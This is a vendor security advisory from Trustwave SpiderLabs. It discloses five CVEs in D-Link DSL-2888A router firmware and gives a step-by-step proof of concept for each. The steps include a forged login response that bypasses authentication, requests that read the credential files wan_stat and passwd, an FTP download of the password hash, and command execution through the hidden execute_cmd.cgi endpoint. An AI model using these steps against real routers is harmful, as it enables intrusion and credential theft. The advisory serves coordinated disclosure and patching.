Trustwave SpiderLabs Security Advisory TWSL2020-011:
Multiple Vulnerabilities in D-Link DSL-2888A

Published: 12/17/2020
Version: 1.0

Vendor: D-Link (https://www.dlink.com.au/home-solutions/DSL-2888A-wireless-ac1600-dual-band-gigabit-adsl2-vdsl-modem-router)
Product: Dual Band Wireless AC1600 Gigabit ADSL2+/VDSL2 Modem Router 
Version affected: firmware prior to AU_2.31_V1.1.47ae55
 
Product description from the D-Link Australia website:
The PYTHON - Dual Band Wireless AC1600 Gigabit ADSL2+ / VDSL2 Modem Router
(DSL-2888A) has all of your online requirements covered with the ADSL/VDSL modem
providing compatibilty with all ADSL, VDSL, NBN and UFB connections.  With Dual
Band AC1600 Wi-Fi providing high speed coverage and a full Gigabit Ethernet
interface, this modem will connect desktop computers, smartphones, gaming
consoles, smart TVs and more throughout your home.

***********************************************************

Finding 1: Insufficient Authentication
Credit: Harold Zang of Trustwave
CVE: CVE-2020-24580
CWE: CWE-287

Trustwave was able to bypass authentication to access index.html.

PoC : 
============================================
1. Navigate to the default login page while using a web interception proxy such
as Burp Suite.

2. Submit the login form with an invalid password.

3. Intercept the response package, replace it with the following payload:


HTTP/1.1 302 Found
Location: /page/login/login_succ.html
Connection: close

HTTP/1.1 200 OK
Connection: close
ETag: "edd-115-54c5ed7b"
Last-Modified: Mon, 26 Jan 2015 07:32:11 GMT
Date: Thu, 01 Jan 1970 00:24:56 GMT
Content-Type: text/html
Content-Length: 277
Transfer-Encoding: chunked

115
<html><head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<script language="javascript">
function frmLoad() {
	top.location.href = "/index.html";
}
</script>
</head>
<body onLoad='frmLoad()'>
</body>
</html>

0


4. Observe successful access of index.html.

***********************************************************

Finding 2: Information Leakage 
Credit: Harold Zang of Trustwave
CVE: CVE-2020-24577
CWE: CWE-200

The DSL-2888A One Touch application discloses sensitive informatiom such as the
admin user's hash and Internet provider connection username and plaintext
password in the application's response body. A malicious network user maybe able
to use the credential to login to the provider main website.

PoC: 
============================================
1. Navigate to the following pages as an authenticated user
http://DeviceIP/tmp/home/wan_stat
http://DeviceIP/tmp/var/passwd

2. Observe the "wan_stat" file disclosing the Internet provider connection
username and plaintext password; and the "passwd" file disclosing the admin
user's hash.

***********************************************************

Finding 3: FTP Misconfiguration
Credit: Harold Zang of Trustwave
CVE: CVE-2020-24578
CWE: CWE-16

The DSL-2888A has a misconfigured FTP service that allows a malicious network
user access to system folders and download sensitive files such as the password
hash file.

PoC: 
============================================
1. Use the following command to connect to the FTP service with valid credentials, with a FTP client.
ftp DeviceIP

2. Use following command to navigate to the root folder.
ftp>cd /

3. Observe directory successfully changed.

4. Use the following command to download the password hash file. 
ftp>cd etc/
ftp>get passwd

5. Observe successful downloading of the file containing the admin user's hash.


***********************************************************

Finding 4: Hidden Functionality 
Credit: Harold Zang of Trustwave
CVE: CVE-2020-24581
CWE: CWE-912

The DSL-2888A contains a functionality that is not available via the router's
web application user interface. This function allows an authenticated user to
execute Operating System commands.

PoC: 
============================================
1. Navigate to following URL with a valid session.
http://DeviceIP/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=ls

2. Observe successful execution the command and list the current folder.


***********************************************************

Finding 5: Improper Authentication
Credit: Harold Zang of Trustwave
CVE: CVE-2020-24579
CWE: CWE-287

Trustwave was able to access the authenticated page without providing valid credential.

PoC: 
============================================
1. Login to the web interface with valid credentials from the source IP address 192.168.1.150 with the HTTP header User-Agent 
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36".

2. Close the browser without clicking the Logout button and shutdown the computer.

3. Using a different machine with the same allocated IP address 192.168.1.150 and User-Agent 
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36",  
browse to any page that requires authentication e.g. WiFi.shtml.

4. Observe successful access to the authenticated page without the requirement for valid credential.

Remediation Steps:
Upgrade to firmware version AU_2.31_V1.1.47ae55 or the latest stable version.

Revision History:
05/26/2020 - Vulnerability disclosed to vendor
08/26/2020 - Tested patch and only FTP Misconfiguration was fixed
10/05/2020 - Retested patch 
10/30/2020 - Patch released by vendor
12/17/2020 - Advisory published

References
1. https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10194


About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security 
risk. With cloud and managed security services, integrated technologies and a 
team of security experts, ethical hackers and researchers, Trustwave enables 
businesses to transform the way they manage their information security and 
compliance programs. More than three million businesses are enrolled in the 
Trustwave TrustKeeper® cloud platform, through which Trustwave delivers 
automated, efficient and cost-effective threat, vulnerability and compliance 
management. Trustwave is headquartered in Chicago, with customers in 96 
countries. For more information about Trustwave, visit 
https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.